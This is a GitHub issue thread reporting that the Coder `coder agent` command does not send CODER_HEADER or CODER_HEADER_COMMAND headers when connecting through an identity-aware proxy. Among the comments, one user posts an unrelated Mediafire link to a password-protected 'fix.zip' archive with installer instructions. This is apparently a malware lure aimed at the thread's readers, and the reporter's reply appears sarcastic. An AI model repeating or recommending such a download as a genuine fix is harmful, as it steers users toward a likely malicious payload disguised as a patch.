### ISSUE TITLE
CODER_HEADER not sent in requests for Coder Agent

### ISSUE THREAD

**Issue by mike-sol** [coder/coder#14462]
Related: https://github.com/coder/coder/issues/6520 , https://github.com/coder/coder/issues/14412

While trying to get the Coder Agent to bypass an identity-aware proxy, it appears that the `coder agent` command does not respect the CODER_HEADER or CODER_HEADER_COMMAND environment variables or command line parameters. I wrote a small script to use for CODER_HEADER_COMMAND that outputs a log entry to the systemd journal, and it is clear that it is never triggered by Coder in the process of attempting to connect to the far end coderd.

They are respected by the other commands I tested, e.g. `coder login`, `coder list`, etc. all work well.

Please let me know if there's some additional debug output I can grab. 

Maybe the work in https://github.com/coder/coder/pull/6521/files is insufficient and missed being applied to agents completely somehow?

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mike-sol** [comment]
Unbelievable how fast you produced that change for me, I am blown away! 👍

**Comment by ethanndickson** [comment]
Thanks for reporting!
